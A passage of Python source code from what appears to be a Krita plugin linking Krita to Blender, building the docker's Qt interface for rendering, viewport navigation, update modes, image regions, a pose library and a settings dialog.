scroll.setFrameShape(QFrame.NoFrame)\n scroll.setFrameShadow(QFrame.Plain)\n scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n\n updateProgress = QProgressBar()\n updateProgress.hide()\n \n settingsHBoxLayout = QHBoxLayout()\n settingsHBoxLayout.addStretch()\n settingsButton = QPushButton()\n settingsButton.setIcon(instance.icon('configure-thicker'))\n settingsButton.setToolTip(i18n(\"Settings\"))\n settingsHBoxLayout.addWidget(settingsButton)\n \n connectionGroupBox = QGroupBox(i18n(\"Connect\"))\n connectionVBoxLayout = QVBoxLayout()\n connectionHBoxLayout = QHBoxLayout()\n startstopButton = QPushButton(i18n(\"Start Server\"))\n startstopButton.setToolTip(i18n(\"Start/Stop the server.\\nYou'll have to connect Blender manually via the companion plugin\\n(In Blender View → Connect to Krita)\"))\n startBlenderButton = QPushButton(i18n(\"Start Blender\"))\n startBlenderButton.setToolTip(i18n(\"Start Blender and connect automagically\"))\n statusBar = QLabel()\n statusBar.setWordWrap(True)\n\n connectionHBoxLayout.addWidget(startBlenderButton)\n connectionHBoxLayout.addWidget(startstopButton)\n connectionVBoxLayout.addLayout(connectionHBoxLayout)\n connectionVBoxLayout.addWidget(statusBar)\n connectionVBoxLayout.addWidget(updateProgress)\n connectionGroupBox.setLayout(connectionVBoxLayout)\n\n viewHBoxLayout = QHBoxLayout()\n viewLabel = QLabel(i18n(\"Mode\")) \n viewComboBox = QComboBox()\n viewComboBox.addItems([i18n(\"Current view\"), i18n(\"Camera\"), i18n(\"Render result\")])\n viewComboBox.setItemData(0, i18n(\"Show view as seen in the active 3D View\"), QtCore.Qt.ToolTipRole)\n viewComboBox.setItemData(1, i18n(\"Show view from the active camera\"), QtCore.Qt.ToolTipRole)\n viewComboBox.setItemData(2, i18n(\"Render and show result\"), QtCore.Qt.ToolTipRole)\n viewComboBox.setToolTip(i18n(\"Select view mode\"))\n\n viewHBoxLayout.addWidget(viewLabel)\n viewHBoxLayout.addWidget(viewComboBox)\n \n renderGroupBox = QGroupBox(i18n(\"Render\"))\n renderVBoxLayout = QVBoxLayout()\n \n renderCurrentViewCheck = QCheckBox(i18n(\"Render from current view\"))\n renderCurrentViewCheck.setToolTip(i18n(\"When disabled, the active camera will be used\"))\n renderOverrideCheck = QCheckBox(i18n(\"Override render settings\"))\n renderOverrideCheck.setChecked(True)\n renderOverrideCheck.setToolTip(i18n(\"Override some of the settings in the .blend file\"))\n\n renderOverrideVBoxLayout = QVBoxLayout()\n\n renderPathCheck = QCheckBox(i18n(\"Override path\"))\n renderPathCheck.setChecked(True)\n renderPathCheck.setToolTip(i18n(\"Use the path specified in settings\"))\n renderResCheck = QCheckBox(i18n(\"Override resolution\"))\n renderResCheck.setChecked(True)\n renderResCheck.setToolTip(i18n(\"Adjust output size to the current document\"))\n renderTransparencyCheck = QCheckBox(i18n(\"Transparent background\"))\n renderTransparencyCheck.setChecked(True)\n renderTransparencyCheck.setToolTip(i18n(\"Render with transparency\"))\n renderTemporaryCheck = QCheckBox(i18n(\"Only apply temporarily\"))\n renderTemporaryCheck.setChecked(True)\n renderTemporaryCheck.setToolTip(i18n(\"Settings will be reverted once the render is done\"))\n \n renderOverrideVBoxLayout.addWidget(renderPathCheck)\n renderOverrideVBoxLayout.addWidget(renderResCheck)\n renderOverrideVBoxLayout.addWidget(renderTransparencyCheck)\n renderOverrideVBoxLayout.addWidget(renderTemporaryCheck)\n\n line0 = QFrame()\n line0.setFrameShape(QFrame.HLine)\n line0.setFrameShadow(QFrame.Sunken)\n \n renderHBoxLayout = QHBoxLayout()\n renderButton = QPushButton(i18n(\"Render\"))\n renderButton.setToolTip(i18n(\"Start a render\"))\n renderAnimationButton = QPushButton(i18n(\"Render Animation\"))\n renderAnimationButton.setToolTip(i18n(\"Render mulitple frames and import them as an animation\"))\n\n renderHBoxLayout.addWidget(renderButton)\n renderHBoxLayout.addWidget(renderAnimationButton)\n \n renderVBoxLayout.addWidget(renderCurrentViewCheck)\n renderVBoxLayout.addWidget(renderOverrideCheck)\n renderVBoxLayout.addLayout(renderOverrideVBoxLayout)\n renderVBoxLayout.addWidget(line0)\n renderVBoxLayout.addLayout(renderHBoxLayout)\n renderGroupBox.setLayout(renderVBoxLayout)\n \n viewGroupBox = QGroupBox(i18n(\"View\"))\n viewVBoxLayout = QVBoxLayout()\n currentViewVBoxLayout = QVBoxLayout()\n navigateWidget = NavigateWidget()\n viewGrid = QGridLayout()\n\n rollLabel = QLabel(i18n(\"Roll\")) \n rollSlider = QSlider(Qt.Horizontal)\n rollSlider.setRange(-1800, 1800)\n rollSpinBox = QDoubleSpinBox()\n rollSpinBox.setRange(-180, 180)\n rollSpinBox.setSuffix(i18n(\"°\"))\n rollSlider.valueChanged.connect(partial(self.changeSpinBox,rollSpinBox))\n rollSpinBox.valueChanged.connect(partial(self.changeSlider,rollSlider))\n \n lensLabel = QLabel(i18n(\"Focal Length\")) \n lensSlider = QSlider(Qt.Horizontal)\n lensSlider.setRange(10, 2500)\n lensSlider.setValue(500)\n lensSpinBox = QDoubleSpinBox()\n lensSpinBox.setRange(1, 250)\n lensSpinBox.setSuffix(i18n(\" mm\"))\n lensSpinBox.setValue(50)\n lensSlider.valueChanged.connect(partial(self.changeSpinBox,lensSpinBox))\n lensSpinBox.valueChanged.connect(partial(self.changeSlider,lensSlider))\n\n viewGrid.addWidget(rollLabel, 0, 0)\n viewGrid.addWidget(rollSlider, 0, 1)\n viewGrid.addWidget(rollSpinBox, 0, 2)\n\n viewGrid.addWidget(lensLabel, 1, 0)\n viewGrid.addWidget(lensSlider, 1, 1)\n viewGrid.addWidget(lensSpinBox, 1, 2)\n\n lensZoomCheck = QCheckBox(i18n(\"Adjust zoom to focal length\"))\n lensZoomCheck.setChecked(True)\n lensZoomCheck.setToolTip(i18n(\"Adjust camera zoom such that when changing the focal length\\nan object in the center approximately stays the same size\"))\n\n line1 = QFrame()\n line1.setFrameShape(QFrame.HLine)\n line1.setFrameShadow(QFrame.Sunken)\n \n cyclesWarning = QLabel(''+i18n(\"Cycles is only supported in render result mode\") + '')\n cyclesWarning.setWordWrap(True)\n cyclesWarning.hide()\n \n transparentCheck = QCheckBox(i18n(\"Transparent background\"))\n transparentCheck.setChecked(True)\n transparentCheck.setToolTip(i18n(\"Use transparency.\\nSupported starting with Blender 3.6.0\"))\n\n gizmoCheck = QCheckBox(i18n(\"Show gizmos\"))\n gizmoCheck.setToolTip(i18n(\"Whether to show gizmos.\\nDepends on the settings of the active 3D View\"))\n\n shadingComboBox = QComboBox()\n shadingComboBox.addItems([i18n(\"Wireframe\"), i18n(\"Solid\"), i18n(\"Material Preview\"), i18n(\"Rendered\")])\n shadingComboBox.setCurrentIndex(1)\n\n viewFormLayout = QFormLayout()\n viewFormLayout.addRow(i18n(\"Viewport shadig:\"), shadingComboBox)\n viewFormLayout.addRow(transparentCheck)\n viewFormLayout.addRow(gizmoCheck)\n \n manualWarning = QLabel('' + i18n(\"Currently in manual mode, changes will become visible after pressing the update button\") + '')\n manualWarning.setWordWrap(True)\n manualWarning.hide()\n \n line2 = QFrame()\n line2.setFrameShape(QFrame.HLine)\n line2.setFrameShadow(QFrame.Sunken)\n \n assistantsButton = QPushButton(i18n(\"Create Assistant Set\"))\n assistantsButton.setToolTip(i18n(\"Create drawing assistants matching the current view.\\nThis will create an xml file which has to be loaded from the tool settings of the assistants tool.\\n(Tool Settings → Load Assistant Set Button)\"))\n\n currentViewVBoxLayout.addWidget(navigateWidget)\n currentViewVBoxLayout.addLayout(viewGrid)\n currentViewVBoxLayout.addWidget(lensZoomCheck)\n currentViewVBoxLayout.addWidget(line1)\n viewVBoxLayout.addLayout(currentViewVBoxLayout)\n viewVBoxLayout.addWidget(cyclesWarning)\n viewVBoxLayout.addLayout(viewFormLayout)\n viewVBoxLayout.addWidget(manualWarning)\n viewVBoxLayout.addWidget(line2)\n viewVBoxLayout.addWidget(assistantsButton)\n viewGroupBox.setLayout(viewVBoxLayout)\n\n updateHBoxLayout = QHBoxLayout()\n updateLabel = QLabel(i18n(\"Update mode\")) \n updateComboBox = QComboBox()\n updateComboBox.addItems([i18n(\"Live\"), i18n(\"Auto\"), i18n(\"Manual\")])\n updateComboBox.setCurrentIndex(1)\n updateComboBox.setItemData(0, i18n(\"Periodically update even when Krita is not in focus\"), QtCore.Qt.ToolTipRole)\n updateComboBox.setItemData(1, i18n(\"Only update when settings change or Krita regains focus\\n(Recommended)\"), QtCore.Qt.ToolTipRole)\n updateComboBox.setItemData(2, i18n(\"Only update when the update button is pressed\\n(Recommended for large resolutions)\"), QtCore.Qt.ToolTipRole)\n updateComboBox.setToolTip(i18n(\"Select when to update the view\"))\n \n updateHBoxLayout.addWidget(updateLabel)\n updateHBoxLayout.addWidget(updateComboBox)\n\n updateGroupBox = QGroupBox(i18n(\"Update\"))\n updateVBoxLayout = QVBoxLayout()\n \n updateForm = QFormLayout()\n updateRateLabel = QLabel(i18n(\"Update\")) \n updateRateComboBox = QComboBox()\n updateRateComboBox.addItems([i18n(\"Every frame\"), i18n(\"Every 4th frame\"), i18n(\"Every 16th frame\"), i18n(\"Every 64th frame\")])\n \n updateResLabel = QLabel(i18n(\"Resolution\")) \n updateResComboBox = QComboBox()\n updateResComboBox.addItems([i18n(\"Full\"), i18n(\"Half\"), i18n(\"Quarter\"), i18n(\"Eighth\")])\n \n #updateForm.addRow(updateRateLabel, updateRateComboBox)\n updateForm.addRow(updateResLabel, updateResComboBox)\n\n line3 = QFrame()\n line3.setFrameShape(QFrame.HLine)\n line3.setFrameShadow(QFrame.Sunken)\n \n updateButtonsHBoxLayout = QHBoxLayout()\n updateButton = QPushButton(i18n(\"Update\")) \n updateButton.setToolTip(i18n(\"Update frame\"))\n updateAnimButton = QPushButton(i18n(\"Update Animation\"))\n updateAnimButton.setToolTip(i18n(\"Update multiple frames and import them as an animation\"))\n\n updateButtonsHBoxLayout.addWidget(updateButton)\n updateButtonsHBoxLayout.addWidget(updateAnimButton)\n\n updateVBoxLayout.addLayout(updateForm)\n updateVBoxLayout.addWidget(line3)\n updateVBoxLayout.addLayout(updateButtonsHBoxLayout)\n updateGroupBox.setLayout(updateVBoxLayout)\n\n regionCheck = QCheckBox(i18n(\"Limit image region\"))\n regionCheck.setToolTip(i18n(\"Limit the frame to a sub-region of the image\"))\n regionGroupBox = QGroupBox(i18n(\"Image Region\"))\n regionGroupBox.hide()\n regionVBoxLayout = QVBoxLayout()\n \n regionXSpinBox = QSpinBox()\n regionXSpinBox.setSuffix(i18n(\" px\"))\n regionYSpinBox = QSpinBox()\n regionYSpinBox.setSuffix(i18n(\" px\"))\n regionWidthSpinBox = QSpinBox()\n regionWidthSpinBox.setSuffix(i18n(\" px\"))\n regionHeightSpinBox = QSpinBox()\n regionHeightSpinBox.setSuffix(i18n(\" px\"))\n \n regionFormLayout = QFormLayout()\n regionFormLayout.addRow(i18n(\"X:\"), regionXSpinBox)\n regionFormLayout.addRow(i18n(\"Y:\"), regionYSpinBox)\n regionFormLayout.addRow(i18n(\"width:\"), regionWidthSpinBox)\n regionFormLayout.addRow(i18n(\"height:\"), regionHeightSpinBox)\n\n regionViewportCheck = QCheckBox(i18n(\"Fixed Viewport\"))\n regionViewportCheck.setChecked(True)\n regionViewportCheck.setToolTip(i18n(\"Crop the frame instead of adjusting the viewport\"))\n\n regionSelectionButton = QPushButton()\n regionSelectionButton.setIcon(instance.icon('tool_rect_selection'))\n regionSelectionButton.setToolTip(i18n(\"Set to current selection\"))\n\n regionHBoxLayout = QHBoxLayout()\n regionHBoxLayout.addWidget(regionViewportCheck)\n regionHBoxLayout.addStretch()\n regionHBoxLayout.addWidget(regionSelectionButton)\n \n regionVBoxLayout.addLayout(regionFormLayout)\n regionVBoxLayout.addLayout(regionHBoxLayout)\n regionGroupBox.setLayout(regionVBoxLayout)\n\n libraryGroupBox = QGroupBox(i18n(\"Library\"))\n libraryVBoxLayout = QVBoxLayout()\n libraryVBoxLayout.setContentsMargins(0, 0, 0, 0)\n\n libraryFormLayout = QFormLayout()\n libraryFormLayout.setContentsMargins(11, 11, 11, 11)\n \n libraryComboBox = QComboBox()\n libraryComboBox.addItems([i18n(\"\")])\n libraryComboBox.setMinimumWidth(100)\n\n libraryAppendButton = QToolButton()\n libraryAppendButton.setIcon(instance.icon('addlayer'))\n libraryAppendButton.setToolTip(i18n(\"Add object to the current scene\"))\n \n libraryHBoxLayout = QHBoxLayout()\n libraryHBoxLayout.addWidget(libraryComboBox)\n libraryHBoxLayout.addWidget(libraryAppendButton)\n\n line4 = QFrame()\n line4.setFrameShape(QFrame.HLine)\n line4.setFrameShadow(QFrame.Sunken)\n \n poseLabel = QLabel(i18n(\"Apply to:\"))\n \n poseComboBox = QComboBox()\n poseComboBox.addItems([i18n(\"\")])\n poseComboBox.setMinimumWidth(100)\n poseComboBox.setToolTip(i18n(\"The armature which the pose will be applied to\"))\n\n poseList = QListWidget()\n poseList.setFlow(QListWidget.LeftToRight)\n poseList.setHorizontalScrollMode(QListWidget.ScrollPerPixel)\n poseList.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n poseList.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOn)\n poseList.setMinimumHeight(190)\n poseList.setMaximumHeight(190)\n poseList.setSpacing(0)\n poseList.setSelectionMode(QAbstractItemView.NoSelection)\n poseList.setToolTip(i18n(\"Pose library assets.\\nDouble click to apply\"))\n\n libraryFormLayout.addRow(i18n(\"Add to scene:\"), libraryHBoxLayout)\n #libraryFormLayout.addRow(line4)\n #libraryFormLayout.addRow(poseLabel, poseComboBox)\n libraryVBoxLayout.addLayout(libraryFormLayout)\n libraryVBoxLayout.addWidget(poseList)\n libraryGroupBox.setLayout(libraryVBoxLayout)\n \n vboxlayout = QVBoxLayout()\n vboxlayout.addWidget(connectionGroupBox)\n vboxlayout.addLayout(viewHBoxLayout)\n vboxlayout.addWidget(renderGroupBox)\n vboxlayout.addWidget(viewGroupBox)\n vboxlayout.addLayout(updateHBoxLayout)\n vboxlayout.addWidget(updateGroupBox)\n vboxlayout.addWidget(regionCheck)\n vboxlayout.addWidget(regionGroupBox)\n vboxlayout.addWidget(libraryGroupBox)\n vboxlayout.addStretch(1)\n vboxlayout.addLayout(settingsHBoxLayout)\n scrollContainer.setLayout(vboxlayout)\n self.setWidget(scroll)\n \n self.progress = updateProgress\n self.settingsButton = settingsButton\n self.startstop = startstopButton\n self.startBlenderButton = startBlenderButton\n self.statusBar = statusBar\n self.renderGroup = renderGroupBox\n self.renderOverride = renderOverrideCheck\n self.renderOverridePath = renderPathCheck\n self.renderOverrideRes = renderResCheck\n self.renderTransparency = renderTransparencyCheck\n self.renderTemporary = renderTemporaryCheck\n self.renderButtonLayout = renderHBoxLayout\n self.view = viewComboBox\n self.viewGroup = viewGroupBox\n self.currentViewLayout = currentViewVBoxLayout\n self.navigate = navigateWidget\n self.roll = rollSpinBox\n self.lens = lensSpinBox\n self.transparentCheck = transparentCheck\n self.shading = shadingComboBox\n self.cyclesWarning = cyclesWarning\n self.manualWarning = manualWarning\n self.update = updateComboBox\n self.updateLayout = updateHBoxLayout\n self.updateGroup = updateGroupBox\n self.updateRate = updateRateComboBox\n self.updateRateLabel = updateRateLabel\n self.updateRes = updateResComboBox\n self.updateResLabel = updateResLabel\n self.updateForm = updateForm\n self.updateSeperator = line3\n self.updateButtonLayout = updateButtonsHBoxLayout\n self.regionGroup = regionGroupBox\n self.regionX = regionXSpinBox\n self.regionY = regionYSpinBox\n self.regionWidth = regionWidthSpinBox\n self.regionHeight = regionHeightSpinBox\n self.regionViewport = regionViewportCheck\n self.libraryGroup = libraryGroupBox\n self.libraryForm = libraryFormLayout\n self.libraryObject = libraryComboBox\n self.libraryAppend = libraryAppendButton\n self.librarySeperator = line4\n self.poseArmaturesLabel = poseLabel\n self.poseArmatures = poseComboBox\n self.poseList = poseList\n\n settingsButton.clicked.connect(self.showSettings) \n startstopButton.clicked.connect(self.startStopServer) \n startBlenderButton.clicked.connect(self.startBlender)\n assistantsButton.clicked.connect(self.createAssistants)\n regionSelectionButton.clicked.connect(self.regionFromSelection)\n updateButton.clicked.connect(self.updateFrame)\n updateAnimButton.clicked.connect(self.updateAnimation)\n\n renderButton.clicked.connect(self.render)\n renderAnimationButton.clicked.connect(partial(self.updateAnimation, True))\n\n renderOverrideCheck.toggled.connect(partial(self.setLayoutVisible, renderOverrideVBoxLayout))\n renderCurrentViewCheck.toggled.connect(partial(self.setSettingsAndSend, 'renderCurrentView'))\n\n poseList.itemDoubleClicked.connect(self.applyPose)\n poseList.horizontalScrollBar().valueChanged.connect(self.requestPosePreviews)\n libraryAppendButton.clicked.connect(self.appendFromLibrary)\n \n viewComboBox.currentIndexChanged.connect(self.viewModeChanged)\n updateComboBox.currentIndexChanged.connect(self.updateModeChanged)\n regionCheck.toggled.connect(regionGroupBox.setVisible)\n regionCheck.toggled.connect(self.resetRegion)\n\n navigateWidget.rotateSignal.connect(lambda p: self.sendBlockableMessage(('rotate', p.x(), p.y(), float(rollSpinBox.value() / 180 * math.pi))))\n navigateWidget.panSignal.connect(lambda p: self.sendBlockableMessage(('pan', p.x(), p.y())))\n navigateWidget.zoomSignal.connect(lambda f: self.sendBlockableMessage(('zoom', f)))\n navigateWidget.orthoSignal.connect(lambda b: self.sendBlockableMessage(('ortho', b)))\n rollSpinBox.valueChanged.connect(lambda v: self.sendBlockableMessage(('rotate', navigateWidget.rotation.x(), navigateWidget.rotation.y(), float(v / 180 * math.pi))))\n lensSpinBox.valueChanged.connect(lambda v: self.sendBlockableMessage(('lens', v)))\n lensZoomCheck.toggled.connect(partial(self.setSettingsAndSend, 'lensZoom'))\n shadingComboBox.currentIndexChanged.connect(lambda v: self.sendBlockableMessage(('shading', v)))\n shadingComboBox.currentIndexChanged.connect(lambda v: self.updateCyclesWarning(self.settings.engine, v))\n\n transparentCheck.toggled.connect(partial(self.setSettingsAndSend, 'transparency'))\n gizmoCheck.toggled.connect(partial(self.setSettingsAndSend, 'gizmos'))\n\n updateRateComboBox.currentIndexChanged.connect(partial(self.setSettingsAndSend, 'framerateScale'))\n updateResComboBox.currentIndexChanged.connect(partial(self.setSettingsAndSend, 'scale'))\n\n regionXSpinBox.valueChanged.connect(self.regionChanged)\n regionYSpinBox.valueChanged.connect(self.regionChanged)\n regionWidthSpinBox.valueChanged.connect(self.regionChanged)\n regionHeightSpinBox.valueChanged.connect(self.regionChanged)\n regionViewportCheck.toggled.connect(self.regionChanged)\n\n self.setLayoutEnabled(self.updateButtonLayout, False)\n self.setLayoutEnabled(self.renderButtonLayout, False)\n libraryGroupBox.setEnabled(False)\n viewGroupBox.setEnabled(False)\n self.updatePoseLibrary([], True)\n self.updateLibraryObjects()\n self.updateModeChanged(1)\n self.viewModeChanged(0)\n self.setStatus(i18n(\"Start server to begin\"))\n \n self.uiContainer = scrollContainer \n self.setAcceptDrops(True)\n QApplication.instance().installEventFilter(self)\n\n def createActions(self):\n if not self.createdActions:\n self.createdActions = True\n window = instance.activeWindow()\n window.createAction('blender_layer_blender').triggered.connect(self.startBlender)\n window.createAction('blender_layer_update').triggered.connect(self.updateFrame)\n window.createAction('blender_layer_render').triggered.connect(self.render)\n window.createAction('blender_layer_update_animation').triggered.connect(self.updateAnimation)\n window.createAction('blender_layer_render_animation').triggered.connect(partial(self.updateAnimation, True))\n\n def canvasChanged(self, canvas):\n self.uiContainer.setEnabled(canvas != None and instance.activeDocument() != None and instance.activeDocument().rootNode() != None)\n \n def eventFilter(self, source, event):\n if event.type() == QEvent.MouseButtonPress and event.buttons() == Qt.MidButton and (event.modifiers() & Qt.AltModifier) == Qt.AltModifier and self.settings.navigateAlt and self.navigate and self.navigate.isEnabled() and self.settings.viewMode == 0:\n self.navigate.mousePressEvent(event, True)\n return True\n elif event.type() == QEvent.MouseMove and event.buttons() == Qt.MidButton and (event.modifiers() & Qt.AltModifier) == Qt.AltModifier and self.settings.navigateAlt and self.navigate and self.navigate.isEnabled() and self.settings.viewMode == 0:\n self.navigate.mouseMoveEvent(event)\n return True\n elif event.type() == QEvent.Wheel and (event.modifiers() & Qt.AltModifier) == Qt.AltModifier and self.settings.navigateAlt and self.navigate and self.navigate.isEnabled() and self.settings.viewMode == 0:\n self.navigate.wheelEvent(event)\n return True\n elif event.type() == QEvent.Drop and self.uiContainer.isEnabled() and event.mimeData().hasUrls() and any(u.toLocalFile().endswith('.blend') for u in event.mimeData().urls()):\n self.dropEvent(event)\n self.setVisible(True)\n return True\n elif type(source) == QMainWindow and event.type() == QEvent.WindowActivate and self.settings.updateMode == 1 and self.server and self.server.running:\n self.server.sendMessage(('requestFrame', True))\n elif (event.type() == QEvent.ContextMenu and source is self.poseList):\n menu = QtWidgets.QMenu()\n menu.addAction(i18n(\"Apply Pose\"))\n flipped = menu.addAction(i18n(\"Apply Flipped\"))\n action = menu.exec_(event.globalPos())\n if action:\n item = source.itemAt(event.pos())\n self.applyPose(item, action == flipped)\n return True\n return super().eventFilter(source, event)\n\n def setSettingsAndSend(self, attr, v):\n setattr(self.settings, attr, v)\n if self.server and self.server.running:\n self.server.sendMessage((attr, v))\n\n def sendBlockableMessage(self, msg):\n if not self.blockServerSignal and self.server and self.server.running:\n self.server.sendMessage(msg)\n\n def changeSpinBox(self, box, value):\n box.setValue(value / 10.0)\n \n def changeSlider(self, slider, value):\n slider.setValue(int(value * 10.0))\n \n def dragEnterEvent(self, event):\n if self.uiContainer.isEnabled() and event.mimeData().hasUrls() and any(u.toLocalFile().endswith('.blend') for u in event.mimeData().urls()):\n event.accept()\n else:\n event.ignore()\n\n def dropEvent(self, event):\n files = [u.toLocalFile() for u in event.mimeData().urls() if u.toLocalFile().endswith('.blend')]\n self.startBlender(True, files[0])\n\n def showSettings(self):\n self.determineBlenderPath(False)\n self.settingsButton.setEnabled(False)\n\n dialog = QDialog(Application.activeWindow().qwindow())\n dialog.setWindowTitle(i18n(\"Blender Layer Settings\"))\n buttonBox = QDialogButtonBox()\n buttonBox.setOrientation(QtCore.Qt.Horizontal)\n buttonBox.setStandardButtons(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)\n buttonBox.accepted.connect(dialog.accept)\n buttonBox.rejected.connect(dialog.reject)\n \n blenderPathInput = QLineEdit()\n blenderPathInput.setText(self.settings.blenderPath)\n blenderPathInput.textEdited.connect(lambda s: setattr(self.settings, 'blenderPath', s))\n blenderPathInput.setToolTip(i18n(\"Path to the Blender executable\"))\n\n def browseBlenderPath():\n dialog = QFileDialog(self, i18n(\"Open Blender executable\"), self.settings.blenderPath if os.path.isfile(self.settings.blenderPath) else QStandardPaths.writableLocation(QStandardPaths.ApplicationsLocation)) \n if dialog.exec_() == QDialog.Accepted:\n self.settings.blenderPath = dialog.selectedUrls()[0].toLocalFile() \n blenderPathInput.setText(self.settings.blenderPath)\n \n blenderPathBrowse = QPushButton()\n blenderPathBrowse.setIcon(instance.icon('folder'))\n blenderPathBrowse.clicked.connect(browseBlenderPath)\n blenderPathBrowse.setToolTip(i18n(\"Browse\"))\n\n blenderPathHBoxLayout = QHBoxLayout()\n blenderPathHBoxLayout.addWidget(blenderPathInput)\n blenderPathHBoxLayout.addWidget(blenderPathBrowse)\n\n renderPathInput = QLineEdit()\n renderPathInput.setText(self.settings.renderPath)\n renderPathInput.textEdited.connect(lambda s: setattr(self.settings, 'renderPath', s))\n renderPathInput.setToolTip(i18n(\"Path where rendered frames will be saved\"))\n\n def browseRenderPath():\n (fileName, mime) = QFileDialog.getSaveFileName(self, i18n(\"Select render output path\"), self.settings.renderPath if os.path.isdir(os.path.dirname(self.settings.renderPath)) else '/tmp')\n if fileName:\n self.settings.renderPath = fileName\n renderPathInput.setText(self.settings.renderPath)\n \n renderPathBrowse = QPushButton()\n renderPathBrowse.setIcon(instance.icon('folder'))\n renderPathBrowse.clicked.connect(browseRenderPath)\n renderPathBrowse.setToolTip(i18n(\"Browse\"))\n\n renderPathHBoxLayout = QHBoxLayout()\n renderPathHBoxLayout.addWidget(renderPathInput)\n renderPathHBoxLayout.addWidget(renderPathBrowse)\n \n layerNameInput = QLineEdit()\n layerNameInput.setText(self.settings.layerName)\n layerNameInput.textEdited.connect(lambda s: setattr(self.settings, 'layerName', s))\n layerNameInput.setToolTip(i18n(\"Name of the layer which shows the view from Blender\"))\n\n relPathCheckBox = QCheckBox(i18n(\"Use relative paths for .blend files\"))\n relPathCheckBox.setChecked(self.settings.relPath)\n relPathCheckBox.toggled.connect(lambda v: setattr(self.settings, 'relPath', v))\n relPathCheckBox.setToolTip(i18n(\"Use a path relative to the current document\\nwhen saving the name of the last open .blend file\"))\n\n navigateAltCheckBox = QCheckBox(i18n(\"Enable navigation with Alt + Middle Button\"))\n navigateAltCheckBox.setChecked(self.settings.navigateAlt)\n navigateAltCheckBox.toggled.connect(lambda v: setattr(self.settings, 'navigateAlt', v))\n navigateAltCheckBox.setToolTip(i18n(\"Enables rotating the view by holding Alt and pressing the Middle Mouse Button,\\nYou can also pan by additionaly holding Ctrl\\nand zoom by holding Shift or using the mouse wheel\"))\n \n form = QFormLayout()\n form.addRow(i18n(\"Blender location:\"), blenderPathHBoxLayout)\n form.addRow(i18n(\"Render location:\"), renderPathHBoxLayout)\n form.addRow(i18n(\"Layer name\"), layerNameInput)\n form.addRow(relPathCheckBox)\n form.addRow(navigateAltCheckBox)\n\n line = QFrame()\n line.setFrameShape(QFrame.HLine)\n line.setFrameShadow(QFrame.Sunken)\n \n libraryGroupBox = QGroupBox(i18n(\"Library\"))\n \n libraryTable = QTableWidget(len(self.settings.library), 3)\n libraryTable.setHorizontalHeaderLabels([i18n(\"Name\"), i18n(\"Path to .blend File\"), i18n(\"Objects to append\")])\n libraryTable.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\n libraryTable.verticalHeader().setVisible(False)\n libraryTable.setSelectionMode(QAbstractItemView.NoSelection)\n libraryTable.setMinimumHeight(190)\n \n row = 0\n for (name, file, innerpath) in self.settings.library:\n libraryTable.setItem(row, 0, QTableWidgetItem(name))\n libraryTable.setItem(row, 1, QTableWidgetItem(file))\n libraryTable.setItem(row, 2, QTableWidgetItem(innerpath))\n row = row + 1\n\n def browseBlendFile():\n row = libraryTable.rowCount() if libraryTable.currentRow() < 0 else libraryTable.currentRow()\n lastItem = libraryTable.item(row, 0)\n lastPath = lastItem.text() if lastItem else ''\n dialog = QFileDialog(self, i18n(\"Open .blend file\"), lastPath if os.path.isfile(lastPath) else QStandardPaths.writableLocation(QStandardPaths.PicturesLocation)) \n if dialog.exec_() == QDialog.Accepted:\n row = libraryTable.rowCount() if libraryTable.currentRow() < 0 else libraryTable.currentRow() + 1\n for file in dialog.selectedUrls():\n file = file.toLocalFile() \n libraryTable.insertRow(row)\n libraryTable.setItem(row, 0, QTableWidgetItem(os.path.basename(file)))\n libraryTable.setItem(row, 1, QTableWidgetItem(file))\n libraryTable.setItem(row, 2, QTableWidgetItem(''))\n row = row + 1\n\n creditLabel = QLabel(\"Body-chan models CC-0 by \" + 'vinchau')\n creditLabel.setTextInteractionFlags(Qt.TextBrowserInteraction);\n creditLabel.setOpenExternalLinks(True);\n addButton = QToolButton()\n addButton.setIcon(instance.icon('addlayer'))\n addButton.setToolTip(i18n(\"Add\"))\n addButton.clicked.connect(browseBlendFile)\n removeButton = QToolButton()\n removeButton.setIcon(instance.icon('deletelayer'))\n removeButton.setToolTip(i18n(\"Remove\"))\n removeButton.clicked.connect(lambda: libraryTable.removeRow(libraryTable.currentRow()))\n \n librarHBox = QHBoxLayout()\n librarHBox.setContentsMargins(11, 0, 11, 11)\n librarHBox.addWidget(creditLabel)\n librarHBox.addStretch()\n librarHBox.addWidget(addButton)\n librarHBox.addWidget(removeButton)\n \n libraryVBox = QVBoxLayout()\n libraryVBox.setContentsMargins(0, 0, 0, 0)\n libraryVBox.addWidget(libraryTable)\n libraryVBox.addLayout(librarHBox)\n libraryGroupBox.setLayout(libraryVBox)\n\n connectionGroupBox = QGroupBox(i18n(\"Connection\"))\n \n portSpinBox = QSpinBox()\n portSpinBox.setRange(0, 65535)\n portSpinBox.setValue(self.settings.port)\n portSpinBox.valueChanged.connect(lambda v: setattr(self.settings, 'port', v))\n \n hostInput = QLineEdit()\n hostInput.setText(self.settings.host)\n hostInput.textEdited.connect(lambda s: setattr(self.settings, 'host', s))\n \n sharedMemCheckBox = QCheckBox(i18n(\"Use shared memory buffer\"))\n sharedMemCheckBox.setChecked(self.settings.sharedMem)\n sharedMemCheckBox.setToolTip(i18n(\"Use shared memory to transfer the pixels from Blender.\\nShould have better performance than sending them via the socket\"))\n sharedMemCheckBox.toggled.connect(lambda v: setattr(self.settings, 'sharedMem', v))\n\n connectionForm = QFormLayout()\n connectionForm.addRow(i18n(\"Host:\"), hostInput)\n connectionForm.addRow(i18n(\"Port:\"), portSpinBox)\n connectionForm.addRow(sharedMemCheckBox)\n connectionGroupBox.setLayout(connectionForm)\n \n assistantsGroupBox = QGroupBox(i18n(\"Assistants\"))\n\n threePointCheckBox = QCheckBox(i18n(\"3 Point Perspective\"))\n threePointCheckBox.setChecked(self.settings.assistantsThreePoint)\n threePointCheckBox.setToolTip(i18n(\"Include a third vanishing point in the assistant set\"))\n threePointCheckBox.toggled.connect(lambda v: setattr(self.settings, 'assistantsThreePoint', v))\n\n axisCheckBox = QCheckBox(i18n(\"Colored Axis\"))\n axisCheckBox.setChecked(self.settings.assistantsAxis)\n axisCheckBox.setToolTip(i18n(\"Include colored lines representing the axis in the assistant set\"))\n axisCheckBox.toggled.connect(lambda v: setattr(self.settings, 'assistantsAxis', v))\n\n assistantsVBox = QVBoxLayout()\n assistantsVBox.addWidget(threePointCheckBox)\n 